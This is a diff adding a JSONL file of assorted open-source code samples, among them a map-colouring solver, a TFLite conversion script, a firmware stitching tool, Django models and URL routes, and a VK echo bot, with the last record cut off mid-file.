diff --git "a/402.jsonl" "b/402.jsonl" new file mode 100644--- /dev/null +++ "b/402.jsonl" @@ -0,0 +1,629 @@ +{"seq_id":"460301343","text":"import importlib\n\nimport csvReader\nimport csv\nimport random\n\nselected_root_domain_values = list()\nstate_list = []\nfailed = False\nback_track_count = 0\nout = \"\"\n\n\ndef read_csv():\n \"\"\"\n The function reads the neighbor_state_dict from csv and sets state_domain_dict for the neighbor_state_dict read.\n :return: 2 dictionaries, one mapping state and its neighbours and the other\n mapping state and its state_domain_dict i.e valid assignable colors.\n \"\"\"\n global neighbor_state_dict, state_domain_dict\n neighbor_state_dict, state_domain_dict = csvReader.read_csv()\n global visited_node\n visited_node = set()\n global selected_dict\n selected_dict = dict()\n global selected_backtrack_node\n selected_backtrack_node = set()\n\n\ndef forward_checking_lcv(failed_index, state_domain_dict, neighbor_state_dict, is_backtrack=False, parent_domain_to_be_chosen=None):\n \"\"\"\n The function implements Forward Checking Algorithm to solve\n Map couloring problem\n :param failed_index:Start Index during backtracking process.\n :param state_domain_dict:Dictionary mapping states and their state_domain_dicts i.e List of legal colors available to be chosen.\n :param neighbor_state_dict: Dictionary mapping states and their neigbours\n :param is_backtrack: Flag to differentiate between backtracking process and the normal flow\n :param parent_domain_to_be_chosen: Parent Domain to be chosen once the algorithm reaches the root node and restarts the algorithm\n :return:\n \"\"\"\n global back_track_count\n global failed\n global out\n key = state_list[0]\n i = failed_index\n while i < len(state_list):\n\n previous_selected_parent_domain = None\n key = state_list[i]\n if len(state_domain_dict[key]) <= 0:\n back_track_count += 1\n out += key.lower() + \",\" + \"White\" + \"\\n\"\n failed = True\n failed_index = i\n break\n else:\n failed = False\n if key not in visited_node and len(state_domain_dict[key]) > 0:\n if is_backtrack and selected_dict.get(key, None) is not None:\n previous_selected_parent_domain = selected_dict.get(key).pop()\n if previous_selected_parent_domain in state_domain_dict[key]:\n state_domain_dict[key].remove(previous_selected_parent_domain)\n if len(selected_dict[key]) == 0:\n del selected_dict[key]\n if parent_domain_to_be_chosen is not None and key == state_list[0]:\n parent_domain = parent_domain_to_be_chosen\n previous_selected_parent_domain = selected_root_domain_values[-1]\n else:\n parent_domain = lcv(key, state_domain_dict, neighbor_state_dict, selected_dict)\n state_domain_dict[key].remove(parent_domain)\n selected_dict.setdefault(key, list()).append(parent_domain)\n visited_node.add(key)\n for neighbours in neighbor_state_dict[key]:\n if previous_selected_parent_domain is not None and previous_selected_parent_domain not in state_domain_dict[neighbours]:\n if neighbours in selected_dict.keys() and previous_selected_parent_domain not in selected_dict[neighbours]:\n state_domain_dict[neighbours].append(previous_selected_parent_domain)\n if parent_domain in state_domain_dict[neighbours] and neighbours not in list(visited_node):\n state_domain_dict[neighbours].remove(parent_domain)\n i += 1\n out += key.lower() + \",\" + parent_domain + \"\\n\"\n if failed:\n length = len(list(selected_backtrack_node))\n if length > 0:\n last_element = list(sorted(selected_backtrack_node))[0]\n failed_index = last_element - 1\n else:\n failed_index -= 1\n while len(state_domain_dict[state_list[failed_index]]) <= 1:\n failed_index -= 1\n selected_backtrack_node.add(failed_index)\n if failed_index > 0:\n visited_node.clear()\n forward_checking_lcv(failed_index, state_domain_dict, neighbor_state_dict, True, None)\n else:\n state_domain_dict_list = ['Red', 'Green', 'Blue', 'Yellow']\n previous_root_values = selected_dict[state_list[0]]\n selected_root_domain_values.extend(previous_root_values)\n for previous_domain in selected_root_domain_values:\n state_domain_dict_list.remove(previous_domain)\n if len(state_domain_dict_list) == 0:\n return\n read_csv()\n forward_checking_lcv(0, state_domain_dict, neighbor_state_dict, True, state_domain_dict_list[0])\n else:\n pass\n\n\ndef lcv(key_state, state_domain, neighbour_list, selected_dict):\n \"\"\"\n :param key: The state for which color have to be selected\n :param state_domain: Dictionary mapping states and their state_domain_dicts i.e List of legal colors available to be chosen.\n :param neighbour_list: Dictionary mapping states and their neigbours\n :return:\n \"\"\"\n num_neighbour_colors = 0\n color_dict = dict()\n for color in state_domain[key_state]:\n for neighbour in neighbour_list[key_state]:\n if neighbour not in selected_dict.keys():\n if color in state_domain[neighbour]:\n if len(state_domain[neighbour]) - 1 == 0:\n color_dict[color] = float(\"inf\")\n else:\n num_neighbour_colors += len(state_domain[neighbour]) - 1\n\n if color not in color_dict.keys():\n color_dict[color] = num_neighbour_colors\n\n return min(color_dict, key=lambda k: color_dict[k])\n\n\ndef main():\n importlib.reload(csvReader)\n read_csv()\n global state_list\n state_list = ['WA', 'OR', 'CA', 'NV', 'ID', 'MT', 'WY', 'UT', 'AZ', 'NM', 'CO', 'ND', 'SD', 'NE', 'KS', 'OK', 'TX', 'MN', 'IA', 'MO', 'AR', 'LA', 'MS', 'AL', 'FL', 'GA', 'SC', 'NC', 'TN', 'KY', 'VA', 'DE', 'MD', 'WV', 'OH', 'IN', 'IL', 'WI', 'MI', 'PA', 'NJ', 'CT', 'RI', 'NY', 'VT', 'NH', 'MA', 'ME', 'AK', 'HI', 'DC']\n forward_checking_lcv(0, state_domain_dict, neighbor_state_dict)\n print(\"Backtrack Count\", back_track_count)\n return out\n","sub_path":"Map-Coloring-Problem- Intelligent Systems/MapColoringBackend-master/ForwardChecking_LCV.py","file_name":"ForwardChecking_LCV.py","file_ext":"py","file_size_in_byte":6277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"456516037","text":"# Run with TF 2.0+\nimport tensorflow as tf\nfrom tqdm import tqdm\nimport tensorflow_datasets as tfds\nimport cv2\nfrom glob import glob\nimport numpy as np\n# Convert the model.\n\ninput_height = 992\ninput_width = 1504\nh_to_w_ratio = input_height /input_width\nnum_calibration_steps = 20\n\n\ndef representative_dataset_gen():\n sample_folder = glob('{}/*.*'.format('samples'))\n data = [load_test_data(sample_file) for sample_file in tqdm(sample_folder)]\n # data = tfds.load(data)\n\n for _ in range(num_calibration_steps):\n image = data.pop()\n yield [image]\n\n\ndef load_test_data(image_path):\n img = cv2.imread(image_path).astype(np.uint8)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = crop(img)\n img = preprocessing(img)\n img = np.expand_dims(img, axis=0)\n return img\n\ncrop_image = lambda img, x0, y0, w, h: img[y0:y0+h, x0:x0+w]\n\ndef crop(img):\n h, w = img.shape[:2]\n # if (h < input_height) or (w < input_width):\n # print(\"Error, please make sure the image is at least\" + str(input_width) + \"x\" + str(input_height))\n # return;\n if (h != input_height) or (w != input_width):\n if(h > w):\n print(\"Error, please make sure the image is in landscape mode\")\n return;\n else:\n crop_height = int(w * h_to_w_ratio)\n height_middle_point = int(h / 2)\n cropped_image = crop_image(img, 0, height_middle_point - int(crop_height / 2), w, crop_height)\n return cropped_image.astype(np.float32)\n else:\n return img\n \n\ndef preprocessing(img):\n img = cv2.resize(img, (input_width, input_height))\n print(input_width)\n print(input_height)\n return img/127.5 - 1.0\n\n\ndef save_images(images, image_path):\n # return imsave(inverse_transform(images), size, image_path)\n return imsave(inverse_transform(images.squeeze()).astype(np.uint8), image_path)\n\ndef inverse_transform(images):\n return (images+1.) / 2 * 255\n\n\ndef imsave(images, path):\n # return misc.imsave(path, images)\n return cv2.imwrite(path, cv2.cvtColor(images, cv2.COLOR_BGR2RGB))\n\n\nmodel = tf.saved_model.load('./')\nconcrete_func = model.signatures[\n tf.saved_model.DEFAULT_SERVING_SIGNATURE_DEF_KEY]\n\n'''keep the ratio as close to 3/2 while being divisible by 32'''\nconcrete_func.inputs[0].set_shape([1, input_height, input_width, 3])\nconverter = tf.lite.TFLiteConverter.from_concrete_functions([concrete_func])\nconverter.optimizations = [tf.lite.Optimize.DEFAULT]\nconverter.representative_dataset = tf.lite.RepresentativeDataset(\n representative_dataset_gen)\ntflite_model = converter.convert()\nopen(\"./converted_model.tflite\",\"wb\").write(tflite_model)\n","sub_path":"models/TFLite/saved_model_to_tflite_int_quantized.py","file_name":"saved_model_to_tflite_int_quantized.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"125725262","text":"class Settings:\n \"\"\"A class to store all settings for Alien Invasion.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize the game's settings.\"\"\"\n # Screen settings\n self.screen_width = 1200\n self.screen_height = 800\n self.bg_colour = (30, 30, 14)\n\n self.ship_limit = 3\n self.ship_speed = 1.5\n\n self.bullet_speed = 1.5\n self.bullet_width = 3\n self.bullet_height = 15\n self.bullet_colour = (60, 60, 60)\n self.bullets_allowed = 3\n\n self.alien_speed = 1\n self.fleet_drop_speed = 10\n # fleet_direction of 1 represents right; -1 represents left.\n self.fleet_direction = 1\n\n # How quickly the game speeds up\n self.speedup_scale = 1.1\n\n self.initialize_dynamic_settings()\n\n def initialize_dynamic_settings(self):\n \"\"\"Initialize settings that change throughout the game.\"\"\"\n self.ship_speed = 1.5\n self.bullet_speed = 3.0\n self.alien_speed = 1.0\n\n # fleet_direction of 1 represents right; -1 represents left.\n self.fleet_direction = 1\n\n # Scoring\n self.alien_points = 50\n\n def increase_speed(self):\n \"\"\"Increase speed settings.\"\"\"\n self.ship_speed *= self.speedup_scale\n self.bullet_speed *= self.speedup_scale\n self.alien_speed *= self.speedup_scale\n\n def _print_settings(self):\n print(f'Ship speed: {self.ship_speed} - Bullet speed: {self.bullet_speed} - Alien speed: {self.alien_speed}\\n')\n","sub_path":"alien_invasion/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"516223979","text":"'''\r\nfirst strip out the constant and coefficent, \r\nperform a simple simplication\r\nreturn as string \r\n'''\r\n\r\ndef parser(a):\r\n a_a = a.index('+')\r\n a_a_num = int(a[:a_a] )\r\n a_b_num = int(a[a_a+1:-1])\r\n \r\n return a_a_num, a_b_num\r\n\r\nclass Solution(object):\r\n \r\n def complexNumberMultiply(self, a, b):\r\n \"\"\"\r\n :type a: str\r\n :type b: str\r\n :rtype: str\r\n \"\"\"\r\n first_a, first_b = parser(a) \r\n second_a, second_b = parser(b) \r\n \r\n val_1 = first_a * second_a\r\n val_2 = (first_a * second_b) + (first_b * second_a) # i coefficent\r\n val_3 = first_b * second_b * -1 # i^2 coefficent \r\n return str(val_1 + val_3 )+ \"+\"+str(val_2) + \"i\"","sub_path":"LeetCode/ComplexNumberMultiply.py","file_name":"ComplexNumberMultiply.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"347970121","text":"## @ StitchIfwi.py\n# This is a python stitching script for Slim Bootloader TGL build\n#\n# Copyright (c) 2019 - 2022, Intel Corporation. All rights reserved.
\n# SPDX-License-Identifier: BSD-2-Clause-Patent\n#\n##\n\nimport sys\nimport os\nimport re\nimport imp\nimport struct\nimport argparse\nimport zipfile\nimport shutil\nimport glob\nimport shlex\nimport subprocess\nimport xml.etree.ElementTree as ET\nfrom xml.dom import minidom\nfrom ctypes import *\nfrom subprocess import call\nfrom StitchLoader import *\nfrom security_stitch_help import *\nsys.dont_write_bytecode = True\n\n\n# sign_bin_flag can be set to false to avoid signing process. Applicable for Btg profile 0\nsign_bin_flag = True\n\nsblopen_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '../../../'))\nif not os.path.exists (sblopen_dir):\n sblopen_dir = os.getenv('SBL_SOURCE', '')\nif not os.path.exists (sblopen_dir):\n raise Exception(\"Please set env 'SBL_SOURCE' to SBL open source root folder\")\n\ndef gen_xml_file(stitch_dir, stitch_cfg_file, btg_profile, plt_params_list, platform, tpm):\n print (\"Generating xml file .........\")\n\n fit_tool = os.path.join (stitch_dir, 'Fit', 'fit')\n new_xml_file = os.path.join (stitch_dir, 'Temp', 'new.xml')\n updated_xml_file = os.path.join (stitch_dir, 'Temp', 'updated.xml')\n sku = stitch_cfg_file.get_platform_sku().get(platform)\n cmd = [fit_tool, '-sku', sku, '-save', new_xml_file, '-w', os.path.join (stitch_dir, 'Temp')]\n run_process (cmd)\n\n tree = ET.parse(new_xml_file)\n\n xml_change_list = stitch_cfg_file.get_xml_change_list (platform, plt_params_list)\n for each in xml_change_list:\n for xml_path, value in each:\n node = tree.find('%s' % xml_path)\n node.set('value', value)\n print (value)\n\n tree.write(updated_xml_file)\n\ndef replace_component (ifwi_src_path, flash_path, file_path, comp_alg, pri_key):\n print (\"Replacing components.......\")\n work_dir = os.getcwd()\n ifwi_bin = bytearray (get_file_data (ifwi_src_path))\n ifwi = IFWI_PARSER.parse_ifwi_binary (ifwi_bin)\n\n # assume a flash map path first\n comp_name = ''\n replace_comps = IFWI_PARSER.locate_components (ifwi, flash_path)\n if len(replace_comps) == 0:\n # assume a container path if not in flash map\n nodes = flash_path.split('/')\n comp_name = nodes[-1]\n flash_path = '/'.join(nodes[:-1])\n replace_comps = IFWI_PARSER.locate_components (ifwi, flash_path)\n\n if len(replace_comps) == 0:\n raise Exception (\"Could not locate component '%s' !\" % flash_path)\n\n if len(replace_comps) > 1:\n raise Exception (\"Multiple components were located for '%s' !\" % flash_path)\n\n replace_comp = replace_comps[0]\n if comp_name:\n # extract container image\n container_file = os.path.join(work_dir, 'CTN_%s.bin') % comp_name\n gen_file_from_object (container_file, ifwi_bin[replace_comp.offset:replace_comp.offset + replace_comp.length])\n comp_file = os.path.join(work_dir, file_path)\n\n if os.name == 'nt':\n tool_bin_dir = os.path.join(sblopen_dir, \"BaseTools\", \"Bin\", \"Win32\")\n else:\n tool_bin_dir = os.path.join(sblopen_dir, \"BaseTools\", \"BinWrappers\", \"PosixLike\")\n gen_container = os.path.join(sblopen_dir, \"BootloaderCorePkg\" , \"Tools\", \"GenContainer.py\")\n if not os.path.isabs(pri_key):\n pri_key = os.path.join (work_dir, pri_key)\n cmd_line = [sys.executable, gen_container, 'replace', '-i', container_file, '-o', container_file, '-n', comp_name,\n '-f', comp_file, '-c', comp_alg, '-k', pri_key, '-td', tool_bin_dir]\n run_process (cmd_line, True)\n comp_bin = bytearray (get_file_data (container_file))\n else:\n # replace directly in flash map\n comp_bin = bytearray (get_file_data (file_path))\n IFWI_PARSER.replace_component (ifwi_bin, comp_bin, flash_path)\n gen_file_from_object (ifwi_src_path, ifwi_bin)\n\ndef replace_components (ifwi_src_path, stitch_cfg_file):\n print (\"Replacing components.......\")\n replace_list = stitch_cfg_file.get_component_replace_list ()\n for flash_path, file_path, comp_alg, pri_key in replace_list:\n replace_component (ifwi_src_path, flash_path, file_path, comp_alg, pri_key)\n\ndef stitch (stitch_dir, stitch_cfg_file, sbl_file, btg_profile, plt_params_list, platform_data, platform, tpm, full_rdundant = True):\n temp_dir = os.path.abspath(os.path.join (stitch_dir, 'Temp'))\n if os.path.exists(temp_dir):\n shutil.rmtree(temp_dir, ignore_errors=True)\n shutil.copytree (os.path.join (stitch_dir, 'Input'), temp_dir)\n\n # Get bios region image ready\n sbl_image_ext = os.path.splitext(sbl_file)\n\n if sbl_image_ext[1] != \".zip\":\n print (\"\\nCopy SBL image %s for stitch\" % sbl_file)\n shutil.copy(sbl_file, os.path.join(temp_dir, \"SlimBootloader.bin\"))\n else:\n print (\"\\nUnpack files from zip file ...\")\n zf = zipfile.ZipFile(sbl_file, 'r', zipfile.ZIP_DEFLATED)\n zf.extractall(temp_dir)\n zf.close()\n\n if platform_data:\n fd = open(os.path.join(temp_dir, \"SlimBootloader.bin\"), \"rb\")\n input_data = bytearray(fd.read())\n fd.close()\n print (\"\\n Adding platform data to Slimbootloader ...\")\n data = add_platform_data(input_data, platform_data)\n fd = open(os.path.join(temp_dir, \"SlimBootloader.bin\"), \"wb\")\n fd.write(data)\n fd.close()\n\n print(\"Replace components in both partitions....\")\n replace_components (os.path.join(temp_dir, \"SlimBootloader.bin\"), stitch_cfg_file)\n\n # Generate xml\n gen_xml_file(stitch_dir, stitch_cfg_file, btg_profile, plt_params_list, platform, tpm)\n\n if sign_bin_flag:\n update_btGuard_manifests(stitch_dir, stitch_cfg_file, btg_profile, tpm)\n else:\n shutil.copy(os.path.join(temp_dir, \"SlimBootloader.bin\"), os.path.join(temp_dir, \"BiosRegion.bin\"))\n\n print (\"Run fit tool to generate ifwi.........\")\n run_process (['./Fit/fit', '-b', '-o', 'Temp/Ifwi.bin', '-f', os.path.join (temp_dir, 'updated.xml'),\n '-s', temp_dir, '-w', temp_dir, '-d', temp_dir])\n return 0\n\ndef get_para_list (plt_para):\n para_lst = dict()\n for idx, para in enumerate(plt_para):\n items = para.split(':')\n item_cnt = len(items)\n para_lst.update( {items[0] : None if (item_cnt == 1) else items[1].strip()})\n return para_lst\n\ndef main():\n hexstr = lambda x: int(x, 16)\n ap = argparse.ArgumentParser()\n ap.add_argument('-p', dest='platform', default = '', help='specify platform sku to stitch')\n ap.add_argument('-w', dest='work_dir', default = '', help='specify stitch workspace directory, CSME tools and ingredients should be here')\n ap.add_argument('-c', dest='config_file', type=str, required=True, help='specify the platform specific stitch config file')\n ap.add_argument('-s', dest='sbl_file', type=str, default='stitch_Components.zip', help='specify slim bootloader file or generate zip file')\n ap.add_argument('-b', dest='btg_profile', default = 'vm', choices=['legacy', 'vm', 'fve', 'fvme'], help='specify Boot Guard profile type')\n ap.add_argument('-d', dest='plat_data', type=hexstr, default=None, help='Specify a platform specific data (HEX, DWORD) for customization')\n ap.add_argument('-r', dest='remove', action = \"store_true\", default = False, help = \"delete temporary files after stitch\")\n ap.add_argument('-t', dest='tpm', default = 'ptt', choices=['ptt', 'dtpm', 'none'], help='specify TPM type')\n ap.add_argument('-o', dest='option', default = '', help = \"Platform specific stitch option. Format: '-o option1;option2;...' For each option its format is 'parameter:data'. Try -o help for more information\")\n ap.add_argument('-op', dest='outpath', default = '', help = \"Specify path to write output IFIW and signed bin files\")\n\n args = ap.parse_args()\n\n stitch_cfg_file = imp.load_source('StitchIfwiConfig', args.config_file)\n if args.work_dir == '':\n print (\"Please specify stitch work directory\")\n print ('%s' % stitch_cfg_file.extra_usage_txt)\n return 1\n\n sku_dict = stitch_cfg_file.get_platform_sku()\n if len (sku_dict) == 1 and args.platform == '':\n for sku in sku_dict:\n args.platform = sku\n print (\"No sku is given, set to default sku value %s\" % sku)\n if args.platform == '' or args.platform not in sku_dict:\n print (\"Invalid sku (%s), Please provide valid sku:\" % args.platform)\n for sku in sku_dict :\n print (\" %s - 'For %s'\" % (sku, sku_dict[sku]))\n return 1\n\n if args.btg_profile in [\"vm\",\"fvme\"] and args.tpm == \"none\":\n print (\"ERROR: Choose appropriate Tpm type for BootGuard profile 3 and 5\")\n return 1\n\n plt_params_list = get_para_list (args.option.split(';'))\n if not stitch_cfg_file.check_parameter(plt_params_list):\n exit (1)\n\n print (\"Executing stitch.......\")\n curr_dir = os.getcwd()\n sbl_file = os.path.abspath(os.path.join (curr_dir, args.sbl_file))\n\n work_dir = os.path.abspath (args.work_dir)\n os.chdir(work_dir)\n if stitch (work_dir, stitch_cfg_file, sbl_file, args.btg_profile, plt_params_list, args.plat_data, args.platform, args.tpm):\n raise Exception ('Stitching process failed !')\n os.chdir(curr_dir)\n\n generated_ifwi_file = os.path.join(work_dir, 'Temp', 'Ifwi.bin')\n ifwi_file_name = os.path.join(args.outpath,'sbl_ifwi_%s.bin' % (args.platform))\n shutil.copy(generated_ifwi_file, ifwi_file_name)\n\n generated_signed_sbl = os.path.join(work_dir, 'Temp', 'SlimBootloader.bin')\n sbl_file_name = os.path.join(args.outpath,'SlimBootloader_%s.bin' % (args.platform))\n shutil.copy(generated_signed_sbl, sbl_file_name)\n\n print (\"\\nIFWI Stitching completed successfully !\")\n print (\"Boot Guard Profile: %s\" % args.btg_profile.upper())\n print (\"IFWI image: %s\\n\" % ifwi_file_name)\n if args.remove:\n shutil.rmtree(os.path.join(work_dir, 'Temp'), ignore_errors=True)\n return 0\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"Platform/TigerlakeBoardPkg/Script/StitchIfwi.py","file_name":"StitchIfwi.py","file_ext":"py","file_size_in_byte":10158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"549114584","text":"import os.path\nfrom django.db import models\nfrom django.core.urlresolvers import reverse\nfrom django.core.files.base import ContentFile\nfrom django.dispatch import receiver\nimport taglib\nfrom mutagen import File\n\nclass Album(models.Model):\n\tname = models.CharField(max_length=64,default=\"\")\n\t\n\tdef get_absolute_url(self):\n\t\treturn reverse('album.detail', args=[str(self.id)])\n\nclass Artist(models.Model):\n\tname = models.CharField(max_length=64,default=\"\")\n\t\nclass Track(models.Model):\n\tTYPE_MP3 = \"audio/mpeg\"\n\tTYPE_OGG = \"audio/ogg\"\n\tFILE_TYPES = (\n\t\t(TYPE_MP3,\"mp3\"),\n\t\t(TYPE_OGG,\"ogg\"),\n\t)\n\tartwork = models.ImageField(upload_to='music/tracks')\n\ttitle = models.CharField(max_length=64,default=\"\")\n\talbum = models.ForeignKey(Album, on_delete=models.CASCADE, null = True)\n\tartist = models.CharField(max_length=64,default=\"\")\n\tgenre = models.CharField(max_length=64,default=\"\")\n\tname = models.CharField(max_length=50,default=\"\")\n\ttype = models.CharField(max_length=20, choices=FILE_TYPES)\n\tfile = models.FileField(upload_to='music/tracks')\n\t\n\tdef get_absolute_url(self):\n\t\treturn reverse('track.detail', args=[str(self.id)])\n\t\n\t\n\tdef updateMetadataSave(self):\n\t\tself.updateMetadata()\n\t\tself.save()\n\t\n\tdef setFieldFromTags(self,tags,tag_title,field_name):\n\t\tif tags.get(tag_title) != None:\n\t\t\tfield = ''\n\t\t\tfor tag_title in tags.get(tag_title):\n\t\t\t\tfield = getattr(self, field_name)\n\t\t\t\tfield = ''\n\t\t\t\tfield += tag_title + ' '\n\t\t\tsetattr(self, field_name, field)\n\n\tdef updateMetadata(self):\n\t\tsong = taglib.File(self.file.path)\t\t\n\t\tself.setFieldFromTags(song.tags,'TITLE','title')\n\t\tif song.tags.get('ALBUM') != None:\n\t\t\tfor album_name in song.tags.get('ALBUM'):\n\t\t\t\ttry:\n\t\t\t\t\talbum = Album.objects.get(name=album_name)\n\t\t\t\t\tself.album = album\n\t\t\t\texcept Album.DoesNotExist:\n\t\t\t\t\tnew_album = Album(name=album_name)\n\t\t\t\t\tnew_album.save()\n\t\t\t\t\tself.album = new_album\n\n\t\tself.setFieldFromTags(song.tags,'ARTIST','artist')\n\t\tself.setFieldFromTags(song.tags,'GENRE','genre')\n\t\tfile = File(self.file.path)\n\t\tif file.tags != None:\n\t\t\tfor tag in file.tags:\n\t\t\t\tif tag.startswith(\"APIC\"):\n\t\t\t\t\tartwork = file.tags[tag].data\n\t\t\t\t\tself.artwork.save('art.jpg',ContentFile(artwork))\n\t\t\t\t\tbreak\n\n\t\tfileName, fileExtension = os.path.splitext(self.file.name)\n\t\tif(fileExtension == '.mp3'):\n\t\t\tself.type = self.TYPE_MP3\n\t\telif(fileExtension == '.ogg'):\n\t\t\tself.type = self.TYPE_OGG\n","sub_path":"wolf_services/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"72166452","text":"from .scholix_v1 import api_v1\n\n\nlinks_from_datasource_parser = api_v1.parser()\nlinks_from_datasource_parser.add_argument('datasource', required=True,\n help=\"Filter Scholix relationships collected from a LinkProvider\")\nlinks_from_datasource_parser.add_argument('page', required=False, help=\"select page of result\")\n\nlinks_from_pid_parser = api_v1.parser()\nlinks_from_pid_parser.add_argument(\"pid\", required=True, help=\"persistent Identifier\")\nlinks_from_pid_parser.add_argument(\"pidType\", required=False, help=\"persistent Identifier Type\")\nlinks_from_pid_parser.add_argument(\"targetPidType\", required=False,\n help=\"typology target filter should be publication, dataset or unknown\")\nlinks_from_pid_parser.add_argument(\"datasourceTarget\", required=False,\n help=\"a datasource provenace filter of the target relation\")\nlinks_from_pid_parser.add_argument(\"page\", required=False, help=\"select page of result\")\n\nlinks_from_publisher_parser = api_v1.parser()\nlinks_from_pid_parser.add_argument(\"publisher\", required=True, help=\"publisher name\")\nlinks_from_publisher_parser.add_argument(\"page\", required=False, help=\"select page of result\")","sub_path":"apis/v1/parser_arguments.py","file_name":"parser_arguments.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"603850950","text":"# module for textadvzix\n\n\n# represents the user\nclass User:\n def __init__(self, name, x=0, y=0):\n self.name = name\n self.x = x\n self.y = y\n self.coords = str(x) + \"x\" + str(y)\n","sub_path":"User.py","file_name":"User.py","file_ext":"py","file_size_in_byte":207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"384601383","text":"\"\"\"\nBasic group long polling example.\n\nCaution: don't store credentials and settings in your git. Use env variables or config file\nWe set it here to simplify the example.\n\n\n\"\"\"\nfrom avkapi import VK\nfrom avkapi import types\nfrom avkapi.dispatcher import Dispatcher\nfrom avkapi.utils.executor import start_polling\n\n# Set your VK credentials.\nVK_ACCESS_TOKEN = '2e37d9dd8f06e2ccf8dae5'\nVK_GROUP_ID = 123456\n\n\n# Create vk instance\n# You can use it for simple calling VK API methods\nvk = VK(access_token=VK_ACCESS_TOKEN)\n\n# Create dispatcher instance\n# You need to use a dispatcher for handling incoming messages from your users\ndp = Dispatcher(vk)\n\n\n@dp.message_handler(content_types=types.MessageType.MESSAGE_NEW)\nasync def echo_handler(message: types.Message):\n \"\"\" Handler catches all incoming messages and sends back the same. \"\"\"\n # calling message.send method\n await vk.messages.send(message=message.text, peer_id=message.peer_id)\n\n\nasync def shutdown(_: Dispatcher):\n \"\"\" Graceful application shutdown. \"\"\"\n await vk.close()\n\n\nif __name__ == '__main__':\n start_polling(dp, group_id=VK_GROUP_ID, on_shutdown=shutdown)\n\n","sub_path":"examples/echo_bot_polling.py","file_name":"echo_bot_polling.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"213411493","text":"from django.conf.urls import include\nfrom django.contrib import admin\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.views import LoginView, LogoutView\nfrom django.urls import path\nfrom django.views.generic.base import RedirectView\nfrom drf_spectacular.views import (\n SpectacularAPIView,\n SpectacularRedocView,\n SpectacularSwaggerView,\n)\n\nfrom auth.views.authtoken import authtoken\nfrom rr.routers import router\nfrom rr.views.attribute import attribute_admin_list, attribute_list, attribute_view\nfrom rr.views.certificate import (\n certificate_admin_list,\n certificate_info,\n certificate_list,\n)\nfrom rr.views.contact import contact_list\nfrom rr.views.email import email_list\nfrom rr.views.endpoint import endpoint_list\nfrom rr.views.login import ShibbolethLoginView, logout_redirect\nfrom rr.views.metadata import metadata, metadata_import, metadata_management\nfrom rr.views.redirecturi import redirecturi_list\nfrom rr.views.serviceprovider import (\n BasicInformationUpdate,\n BasicInformationView,\n LdapServiceProviderCreate,\n LdapTechnicalInformationUpdate,\n OidcServiceProviderCreate,\n OidcTechnicalInformationUpdate,\n SAMLAdminList,\n SamlServiceProviderCreate,\n SamlTechnicalInformationUpdate,\n ServiceProviderDelete,\n ServiceProviderList,\n)\nfrom rr.views.sp_errors import sp_error\nfrom rr.views.spadmin import activate_key, admin_list\nfrom rr.views.statistics import statistics_list, statistics_summary_list\nfrom rr.views.testuser import testuser_attribute_data, testuser_list\nfrom rr.views.usergroup import usergroup_list\n\n# Overwrite default status handlers\nhandler400 = \"rr.views.handlers.bad_request\"\nhandler403 = \"rr.views.handlers.permission_denied\"\nhandler404 = \"rr.views.handlers.page_not_found\"\nhandler500 = \"rr.views.handlers.server_error\"\n\nurlpatterns = [\n path(\"api/v1/\", include(router.urls)),\n path(\"api/schema/\", SpectacularAPIView.as_view(), name=\"schema\"),\n path(\"api/schema/swagger/\", SpectacularSwaggerView.as_view(url_name=\"schema\"), name=\"swagger-ui\"),\n path(\"api/schema/redoc/\", SpectacularRedocView.as_view(url_name=\"schema\"), name=\"redoc\"),\n path(\"swagger/\", RedirectView.as_view(url=\"/api/schema/swagger/\")),\n path(\"admin_django/doc/\", include(\"django.contrib.admindocs.urls\")),\n path(\"admin_django/\", admin.site.urls),\n path(\"\", login_required(ServiceProviderList.as_view()), name=\"front-page\"),\n path(\"authtoken/\", authtoken, name=\"auth-token\"),\n path(\"login/\", LoginView.as_view(), name=\"login\"),\n path(\"login/shibboleth/\", ShibbolethLoginView.as_view(), name=\"shibboleth-login\"),\n path(\"logout/\", logout_redirect, name=\"logout\"),\n path(\n \"logout/local/\",\n LogoutView.as_view(template_name=\"registration/logout.html\", redirect_field_name=\"return\"),\n name=\"logout-local\",\n ),\n path(\"list/\", login_required(ServiceProviderList.as_view()), name=\"serviceprovider-list\"),\n path(\"admin//\", admin_list, name=\"admin-list\"),\n path(\"attribute//\", attribute_list, name=\"attribute-list\"),\n path(\"attribute/list/\", attribute_admin_list, name=\"attribute-admin-list\"),\n path(\"attribute/view//\", attribute_view, name=\"attribute-view\"),\n path(\"certificate//\", certificate_list, name=\"certificate-list\"),\n path(\"certificate/info//\", certificate_info, name=\"certificate-info\"),\n path(\"certificate/list/\", certificate_admin_list, name=\"certificate-admin-list\"),\n path(\"contact//\", contact_list, name=\"contact-list\"),\n path(\"endpoint//\", endpoint_list, name=\"endpoint-list\"),\n path(\"email/\", email_list, name=\"email-list\"),\n path(\"metadata/import/\", metadata_import, name=\"metadata-import\"),\n path(\"metadata/manage/saml/\", metadata_management, {\"service_type\": \"saml\"}, name=\"metadata-manage-saml\"),\n path(\"metadata/manage/ldap/\", metadata_management, {\"service_type\": \"ldap\"}, name=\"metadata-manage-ldap\"),\n 